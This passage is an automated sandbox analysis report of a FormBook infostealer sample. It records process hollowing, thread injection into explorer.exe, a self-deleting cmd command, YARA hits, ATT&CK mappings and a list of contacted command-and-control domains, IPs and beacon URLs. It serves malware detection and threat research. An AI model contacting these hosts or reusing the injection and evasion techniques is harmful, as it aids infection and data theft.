          Source: C:\Users\user\Desktop\eQLPRPErea.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\eQLPRPErea.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: EA0000
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: explorer.exe, 00000005.00000002.954492483.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000002.964268158.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery141Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383832 Sample: eQLPRPErea.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 4 other signatures 2->42 10 eQLPRPErea.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\e4utfxiuc.dll, PE32 10->28 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Contains functionality to prevent local Windows debugging 10->60 14 eQLPRPErea.exe 10->14         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.appgusher.com 156.254.221.72, 49773, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 17->30 32 td-balancer-dc11-60-177.wixdns.net 185.230.60.177, 49759, 80 WIX_COMIL Israel 17->32 34 23 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Performs DNS queries to domains with low reputation 17->46 21 wlanext.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          eQLPRPErea.exe29%VirustotalBrowse
          eQLPRPErea.exe31%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.eQLPRPErea.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.wlanext.exe.8bf110.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.eQLPRPErea.exe.1eb20000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.1.eQLPRPErea.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.wlanext.exe.3597960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.eQLPRPErea.exe.6fc60000.6.unpack100%AviraHEUR/AGEN.1131513Download File

          Domains

          SourceDetectionScannerLabelLink
          www.bedpee.com1%VirustotalBrowse
          www.420vaca.com0%VirustotalBrowse
          playfulpainters.com5%VirustotalBrowse
          www.qcmax.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.stone-master.info/aqu2/0%Avira URL Cloudsafe
          http://www.qcmax.com/aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.heliumhubs.com/aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO40%Avira URL Cloudsafe
          http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH100%Avira URL Cloudmalware
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p100%Avira URL Cloudmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p100%Avira URL Cloudmalware
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p100%Avira URL Cloudmalware
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bedpee.com
          		13.248.216.40
          		truetrueunknown
          parking.namesilo.com
          		64.32.22.102
          		truefalse
            		high
            www.420vaca.com
            		64.190.62.111
            		truetrueunknown
            parkingpage.namecheap.com
            		198.54.117.215
            		truefalse
              		high
              playfulpainters.com
              		34.102.136.180
              		truefalseunknown
              www.qcmax.com
              		104.128.125.95
              		truetrueunknown
              www.appgusher.com
              		156.254.221.72
              		truetrue
                		unknown
                www.autobrehna.com
                		62.116.130.8
                		truetrue
                  		unknown
                  td-balancer-dc11-60-177.wixdns.net
                  		185.230.60.177
                  		truetrue
                    		unknown
                    heliumhubs.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      pmrack.com
                      		135.181.58.27
                      		truetrue
                        		unknown
                        biehnrecords.com
                        		184.168.131.241
                        		truetrue
                          		unknown
                          www.dottproject.com
                          		91.195.240.94
                          		truetrue
                            		unknown
                            www.biehnrecords.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.pmrack.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.heliumhubs.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.shujahumayun.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.stone-master.info
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.thesixteenthround.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.nagoyadoori.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.playfulpainters.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.serversexposed.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              www.stone-master.info/aqu2/true
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.qcmax.com/aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3ptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heliumhubs.com/aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3pfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3ptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReHfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3ptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3ptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3ptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7true
                                              • Avira URL Cloud: malware
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.carterandcone.comlexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://fontfabrik.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://produkte.web.de/homepage-und-mail/homepage-parken/wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.%s.comPAexplorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		low
                                                                  http://www.fonts.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sakkal.comexplorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://browsehappy.com/wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpfalse
                                                                      		high

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      91.195.240.94
                                                                      		www.dottproject.comGermany
                                                                      		47846SEDO-ASDEtrue
                                                                      135.181.58.27
                                                                      		pmrack.comGermany
                                                                      		24940HETZNER-ASDEtrue
                                                                      64.32.22.102
                                                                      		parking.namesilo.comUnited States
                                                                      		46844ST-BGPUSfalse
                                                                      184.168.131.241
                                                                      		biehnrecords.comUnited States
                                                                      		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                      62.116.130.8
                                                                      		www.autobrehna.comGermany
                                                                      		15456INTERNETX-ASDEtrue
                                                                      104.128.125.95
                                                                      		www.qcmax.comUnited States
                                                                      		26658HENGTONG-IDC-LLCUStrue
                                                                      185.230.60.177
                                                                      		td-balancer-dc11-60-177.wixdns.netIsrael
                                                                      		58182WIX_COMILtrue
                                                                      34.102.136.180
                                                                      		playfulpainters.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      13.248.216.40
                                                                      		www.bedpee.comUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      64.190.62.111
                                                                      		www.420vaca.comUnited States
                                                                      		11696NBS11696UStrue
                                                                      156.254.221.72
                                                                      		www.appgusher.comSeychelles
                                                                      		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                      198.54.117.215
                                                                      		parkingpage.namecheap.comUnited States
                                                                      		22612NAMECHEAP-NETUSfalse

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:383832
                                                                      Start date:08.04.2021
                                                                      Start time:10:46:52
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 59s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:eQLPRPErea.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@15/12
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 24.2% (good quality ratio 21.9%)
                                                                      • Quality average: 73.7%
                                                                      • Quality standard deviation: 31.6%
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
